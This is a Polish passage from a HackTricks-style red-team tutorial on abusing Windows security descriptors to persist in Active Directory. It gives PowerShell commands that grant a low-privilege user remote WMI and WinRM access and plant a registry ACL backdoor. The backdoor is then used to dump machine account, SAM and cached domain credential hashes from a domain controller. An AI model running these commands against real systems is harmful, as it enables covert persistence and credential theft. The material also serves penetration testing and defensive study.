5.4 KiB
Deskryptory zabezpieczeń
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!
Inne sposoby wsparcia HackTricks:
- Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź PLAN SUBSKRYPCJI!
- Zdobądź oficjalne gadżety PEASS & HackTricks
- Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @carlospolopm.
- Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów GitHub.
Deskryptory zabezpieczeń
Z dokumentacji: Język definicji deskryptora zabezpieczeń (SDDL) definiuje format używany do opisu deskryptora zabezpieczeń. SDDL używa ciągów ACE do DACL i SACL: ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;
Deskryptory zabezpieczeń są używane do przechowywania uprawnień, jakie obiekt ma nad innym obiektem. Jeśli możesz wykonać niewielką zmianę w deskryptorze zabezpieczeń obiektu, możesz uzyskać bardzo interesujące uprawnienia do tego obiektu, nie będąc członkiem uprzywilejowanej grupy.
Ta technika trwałości opiera się na zdolności do zdobycia wszystkich wymaganych uprawnień do określonych obiektów, aby móc wykonać zadanie, które zwykle wymaga uprawnień administratora, ale bez konieczności posiadania uprawnień administratora.
Dostęp do WMI
Możesz dać użytkownikowi dostęp do zdalnego wykonywania WMI korzystając z tego:
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose #Remove
Dostęp do WinRM
Daj dostęp do konsoli PS winrm użytkownikowi korzystając z tego:
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove
Zdalny dostęp do skrótów
Uzyskaj dostęp do rejestru i wydumpuj skróty tworząc tylną furtkę rejestru za pomocą DAMP, dzięki czemu w dowolnym momencie możesz odzyskać skrót komputera, SAM oraz dowolne buforowane poświadczenia AD na komputerze. Jest to bardzo przydatne, aby nadać to uprawnienie zwykłemu użytkownikowi wobec komputera kontrolera domeny:
# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose
Sprawdź Silver Tickets, aby dowiedzieć się, jak można wykorzystać skrót hasła konta komputera kontrolera domeny.
Dowiedz się, jak hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!
Inne sposoby wsparcia HackTricks:
- Jeśli chcesz zobaczyć reklamę swojej firmy w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź SUBSCRIPTION PLANS!
- Zdobądź oficjalne gadżety PEASS & HackTricks
- Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @carlospolopm.
- Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów GitHub.